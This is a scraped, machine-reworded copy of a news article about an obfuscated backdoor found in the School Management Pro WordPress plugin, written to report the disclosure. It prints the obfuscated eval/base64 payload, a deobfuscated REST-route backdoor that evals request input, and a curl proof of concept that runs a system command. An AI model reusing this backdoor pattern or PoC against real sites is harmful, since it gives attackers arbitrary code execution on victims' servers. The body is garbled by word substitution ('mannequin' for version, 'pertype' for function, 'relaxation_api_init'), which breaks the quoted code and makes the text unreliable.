WordPress

Researchers find backdoor lurking in WordPress plugin used by schools – Ars Technica

Summary

Researchers said on Friday that they found a malicious backdoor in a WordPress plugin that gave attackers full control of websites that used the package, which is marketed to schools.

The premium version of School Management, a plugin schools use to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a blog post without ruling out that it had been present …….

Researchers said on Friday that they found a malicious backdoor in a WordPress plugin that gave attackers full administration Of Webweb websites that used the package deal, which is marketed To extreme schools.

The premium mannequin Of school Management, a plugin schools use To function and handle their internet web websites, has contained the backdoor since A minimal of mannequin 8.9, researchers at internet website safety service Jetpack said in a weblog submit with out ruling out that it had been current in earlier fashions. This Website from A third-celebration website reveals that mannequin 8.9 was launched final August.

Apparent backdoor

Jetpack said it found the backdoor after assist group members at WordPress.com reported discovering closely obfuscated code on a quantity of web websites that used School Management Professional. After deobfuscating it, they realized that the code, stashed Inside the license-checking An factor of the plugin, was deliberately positioned there with the objective of giving outsiders The power to take administration Of internet web websites.

“The code itself isn’t all that fascinating: it’s an obvious backdoor injected into the license-checking code of the plugin,” the Jetpack submit said. “It permits any attacker to execute arbitrary PHP code on The state of affairs with the plugin put in.”

Commercial

In its obfuscated type, the code Appeared like this:

}
$_fc = eval("x65x76x61x6c(x67x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "x6cx61x74" . "x65x28x62"."x61x73x65x36"."x34x5fx64x65x63x6fx64x65x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs='" . str_repeat(chr(0x29), 3)."x3b");
class WLSM_Crypt_Blowfish_DefaultKey

After deobfuscation, the code was:

add_action( 'relaxation_api_init', pertype() {
        register_relaxation_route(
                'am-member', 'license',
                array(
                        'strategies'  => WP_REST_Server::CREATABLE,
                        'callback' => pertype( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

Researchers wrote a proof-of-idea exploit that confirmed the obfuscated code was certainly a backdoor that allowed anyone with intypeation of it to execute code of their selection on any website working the plugin.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-knowledge) gid=33(www-knowledge) groups=33(www-knowledge)

Warning: Can't modify header intypeation - headers already despatched by (output started .......

Source: https://arstechnica.com/information-technology/2022/05/researchers-find-backdoor-lurking-in-wordpress-plugin-used-by-schools/